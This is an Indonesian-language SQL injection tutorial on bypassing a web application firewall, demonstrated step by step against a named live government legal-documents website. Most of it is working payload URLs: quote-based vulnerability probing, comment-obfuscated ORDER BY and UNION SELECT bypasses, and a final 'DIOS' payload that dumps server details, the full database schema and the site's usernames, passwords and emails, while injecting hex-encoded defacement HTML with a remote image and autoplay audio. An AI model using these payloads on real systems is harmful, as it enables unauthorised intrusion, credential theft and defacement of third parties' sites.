Sqli bypass Waf 403

Halo gan, welcome!!

         Yo gan langsung saja ya, pertama kita siapkeun dlu bahan bahannya:
1. Koneksi internet
2. Browser
3. Live target
4. Kopi dan otak
Oke disini saya sudah menyiapkan live target, yaitu 

http://jdih.madiunkab.go.id/ yak, siapin otak kalian

Step 1: mencari inject point.

        Cara mencari inject point dalam sqli yaitu bisa dengan view source atau mengklik directory lain dalam web tersebut. Disini saya sudah mendapatkannya di parameter detail produk

http://jdih.madiunkab.go.id/?hal=detailprodukhukum&id=2017010007 

Step kedua: kutip(')

         Yak, setelah inject point kita akan mengetahui web tersebut vuln injeksi sql dengan tanda kutip(') atau dengan (/**). Disini kita pakai tanda kutip('). Cara mengetahui web itu vuln atau tidak yakni dengan berubahnya tampilan web atau ada tulisan 

Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in

Dan lain lain

Step ketiga: order by

      Setelah mengetahui webnya vuln langsung kita order by.

Langsung aja, disini kita akan bypass waf, tambahkan and true setelah kutip dan bypass order by nya, seperti:

http://jdih.madiunkab.go.id/?hal=detailprodukhukum&id=2017010007%27and%20true%20/*!12345ORDER*/%20/*!BY*/%201--%20- (ga error)

Dan yak, berubah kembali seperti tampilan awal, lgsg kita cari tab vulnnya, saya akan lgsg ke error aja

http://jdih.madiunkab.go.id/?hal=detailprodukhukum&id=2017010007%27and%20true%20/*!12345ORDER*/%20/*!BY*/%2010--%20- (error)

Oke kita dah tau errornya, langsung kita union select, step selanjutnya

Step ke empat: Union select

      Pada step ini kita akan mencari angka ajaibnya:v , dalam step ini tambahkan character(-) sebelum parameter id dan bypass union selectnya, seperti

http://jdih.madiunkab.go.id/?hal=detailprodukhukum&id=-2017010007%27%20and%20true%20%23xyz%0AUnIOn%23xyz%0ASeLecT%201,2,3,4,5,6,7,8,9--%20-

Tampilannya akan seperti ini

Yak itu dia angka ajaibnya, banyak kan:v , itulah tempat naro dios dan hexanya pada angka tersebut, yak ini solved gua. Untuk dios kalian bisa cari di google dan untuk hex kalian hex html kalian di: https://www.online-toolz.com/tools/text-hex-convertor.php

http://jdih.madiunkab.go.id/?hal=detailprodukhukum&id=-2017010007%27%20and%20true%20%23xyz%0AUnIOn%23xyz%0ASeLecT%201,concat(0x3c62723e3c62723e3c696d67207372633d2268747470733a2f2f692e6962622e636f2f677a47467179472f476c697463682d43616d2d32303139313231322d3233313731323836352e6a7067222077696474683d22343030707822206865696768743d223430307078223e3c62723e3c62723e3c68313e496e6a6563746564206279202e2f44346e7a58303c2f68313e3c617564696f206175746f706c61793d226175746f706c61792220636f6e74726f6c733d22636f6e74726f6c73222069643d226c61677522207372633d2268747470733a2f2f672e746f7034746f702e696f2f6d5f313433386f63387569312e6d70332220747970653d22617564696f223e3c2f617564696f3e,version(),0x3c62723e,user(),0x3c62723e,database(),0x3c62723e,@@hostname,0x3c62723e,@@tmpdir,0x3c62723e,@@datadir,0x3c62723e,@@basedir,0x3c62723e,schema(),0x3c62723e,session_user(),0x3c62723e,UUID(),0x3c62723e,current_user(),0x3c62723e,system_user(),0x3c62723e,@@GLOBAL.have_symlink,0x3c62723e,@@GLOBAL.have_ssl,0x3c627232e,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)),3,4,5,group_concat(username,0x3a,password,0x3a,email,0x3a,level),7,8,9%20from%20user--%20-

Yak sekian terimakasih

By: ./D4nzX0